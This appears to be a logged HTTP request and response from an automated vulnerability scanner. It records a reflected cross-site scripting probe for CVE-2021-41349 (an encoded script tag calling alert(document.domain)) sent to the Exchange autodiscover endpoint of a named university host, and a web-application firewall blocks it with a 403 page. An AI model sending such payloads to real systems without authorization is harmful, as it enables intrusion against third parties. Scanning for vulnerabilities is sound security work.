[CVE-2021-41349] Dumped HTTP request for https://emt.ormond.unimelb.edu.au/autodiscover/autodiscover.json


POST /autodiscover/autodiscover.json HTTP/1.1
Host: emt.ormond.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Content-Length: 66
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1
[CVE-2021-41349] Dumped HTTP response https://emt.ormond.unimelb.edu.au/autodiscover/autodiscover.json

HTTP/1.1 403 Forbidden
Connection: close
Content-Length: 833
Cache-Control: no-cache, no-store
Content-Type: text/html
Set-Cookie: visid_incap_3129151=y3DnilBMS2KJKGtzOpcaxAtyk2gAAAAAQUIPAAAAAADe27zNycz+P1HaBDEYWEas; expires=Thu, 06 Aug 2026 08:08:39 GMT; HttpOnly; path=/; Domain=.ormond.unimelb.edu.au
Set-Cookie: incap_ses_1540_3129151=Y17ZIfCXhwzG2WxVQi5fFQtyk2gAAAAA3QS4V3Q1vVi4oG8DUARp2Q==; path=/; Domain=.ormond.unimelb.edu.au
X-Iinfo: 10-5333002-0 NNNY RT(1754493451938 7) q(0 0 0 -1) r(0 -1) B15(1,502,52) U6

<html style="height:100%"><head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW"><meta name="format-detection" content="telephone=no"><meta name="viewport" content="initial-scale=1.0"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><script src="/Lime-king-Seruants-giues-the-does-we-with-my-for" async></script></head><body style="margin:0px;height:100%"><iframe id="main-iframe" src="/_Incapsula_Resource?CWUDNSAI=23&xinfo=10-5333002-0%20NNNY%20RT%281754493451938%207%29%20q%280%200%200%20-1%29%20r%280%20-1%29%20B15%281%2c502%2c52%29%20U6&incident_id=1540000460019845893-25128883087215498&edet=15&cinfo=01000000d6fe&rpinfo=0&mth=POST" frameborder=0 width="100%" height="100%" marginheight="0px" marginwidth="0px">Request unsuccessful. Incapsula incident ID: 1540000460019845893-25128883087215498</iframe></body></html>
